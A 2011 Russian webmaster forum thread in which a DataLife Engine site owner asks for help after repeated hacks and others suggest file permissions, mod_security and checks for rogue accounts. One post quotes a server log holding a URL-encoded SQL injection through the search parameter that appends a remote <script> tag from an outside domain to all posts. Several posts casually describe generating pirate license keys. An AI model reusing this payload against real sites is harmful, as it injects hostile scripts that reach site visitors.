Взлом DLE через apache - возможно ли?

123
G
На сайте с 12.04.2008
Offline
101
#11
dlepro_com:
Вы думаете?
это неэлементарно, для многих чистый двиг это нулл и нет разницы от кого.
а ещё есть товарищи кричащие, что у них чистый двиг с оффсайта, только черз ***.** ключ сгенерирован, спрашиваешь так откуда сам скрипт скачан, если ты ключ генерировал левый, а он грит скачал с ГС, но он чистый на том ГС написано так.
ЗЫ: такая у нас наивность в рунете...

dlepro_com добавил 09.02.2011 в 12:38

как вы могли скачать с оффсайта, если ключ генерировали, и какая админзона на dle-news?

ЗЫ: не успел я сообщения написать как пришёл ответ от ТС...

А в чем проблема со скачкой? Наприме имешь одну лицензию на один домен, соответственно имешь доступ к скачиванию обновлений. Вот и качешь с dle-news обновления и новые версии, но устанавливаешь на другой домен, соответственно для другого домена нет ключа вот и пользуются генераторами.

Продажа сайтов (/ru/forum/866932) под Amazon и AdSense
jcrush
На сайте с 04.07.2004
Offline
371
#12

а зачем вы права такие ставите? на все файлы?

» Блог (http://blog.stfw.ru/) - SEO-заметки. ДВчат: @dvchat (https://t.me/dvchat)
G
На сайте с 17.11.2006
Offline
141
#13

был сайт с оф ключем. я с dle-news дистр скачал на другой проект. и ключ сгенерировал.

gubkin добавил 09.02.2011 в 12:47

jcrush:
а зачем вы права такие ставите? на все файлы?

подскажите какие надо

dlepro_com
На сайте с 16.12.2009
Offline
39
#14
GSMtricks:
А в чем проблема со скачкой? Наприме имешь одну лицензию на один домен, соответственно имешь доступ к скачиванию обновлений. Вот и качешь с dle-news обновления и новые версии, но устанавливаешь на другой домен, соответственно для другого домена нет ключа вот и пользуются генераторами.

Вы ответили за ТС, я думаю у него не та ситуация, которую вы описали, он же про какую-то админзону написал, значит не знает как и где скачивается дистрибутив. И думаю если бы ситуация была той которую вы озвучили ТС бы решал вопрос с разработчиком аргументируя что ломают сайт с той 1-ой лицензией которая у него есть.

vip-59
На сайте с 11.08.2009
Offline
63
#15

Разные манипуляции с изменениями паролей к базам к фтп и к VPS ни к чему ни привели.

gubkin:
что значит ломают через поиск???

Вот что показывали логи:

?subaction=search&do=search&storyle&sql_count=UPDATE+dle_post+SET+short_story%3DCONCAT%28short_story%2Cchar%2860%2C115
%2C99%2C114%2C105%2C112%2C116%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116
%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C111%2C103%2C108%2C108%2C101%2C46%2C111%2C114%2C103%2C47%29%
2CMD5%28RAND%28%29%29%2Cchar%2846%2C106%2C115%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C47%
2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C62%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29+%2Cfull_story%3DCONCAT%28full_story%2Cchar%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C32%2C115%2C114%2C99
%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C103%2C111%2C111%2C111%2C103%2C108%2C108%2C101%2C46
%2C111%2C114%2C103%2C47%29%2CMD5%28RAND%28%29%29%2Cchar%2846%2C106%2C115%2C34%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C47
%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C62%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3B&titleonly=4
Сайты - не глисты, за месяц не выведешь!
dlepro_com
На сайте с 16.12.2009
Offline
39
#16

ТС,

.htaccess 444 выставите, а остальное по мануалу движка, но всё-таки ищите проблему в дистрибутиве и ограничьте максимально доступ к админке.

от взломов защитится 100% невозможно, кроме как сайт держа на компе и без выхода в сеть...

vip-59,

эту дыру закрывали на оффсайте

fxtotal
На сайте с 18.08.2007
Offline
75
#17

vip-59, Этой дыры в 9.2 вообще нет

ТС, Свой комп на вирусы проверяли?

Прошерстите пользователей, нет ли там кого-либо с датой реги 1970г? У меня именно эти умники лезли в шаблоны.

Через дыры сервера и движка гадят, в основном, в БД. У Вас же только в шаблонах. Поэтому, можно предположить, что получили только пароль от Админки. Возможно, они успели поменять права пользователям (группам пользователей) и пользуются правами Администратора.

Бизнес, полностью посвященный служению людям, будет иметь только одну проблему с доходами. Они будут крайне высокими.
G
На сайте с 17.11.2006
Offline
141
#18

все проверил((( админов нет нет вообще пользователей кроме админа.

лишних файлов нет.

пароли менял...

какие будут предложения ... помогите плиз

Zaqwr
На сайте с 08.08.2007
Offline
111
#19
gubkin:
иногда меняется владелец на APACHE

может не меняется, а удаляется, и записывается новый? кстати это происходит с файлом/каталогом какие изменения при этом, mod_security попорбуйте, поможет 99%

Администрирование, Linux, Cisco, Juniper
Хортица
На сайте с 22.12.2006
Offline
289
#20
gubkin:
какие будут предложения ... помогите плиз

Читать и учить. Учить и читать. Думать, читать, учить и прочие вариации данных слов.

А если не поможет, то:

1) Найти шел у себя или на соседнем сайте - настройками апач не запретишь просмотр файлов, без потери работоспособности сайта

2) Заплатить тому кто это сделает за вас :2cents:

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий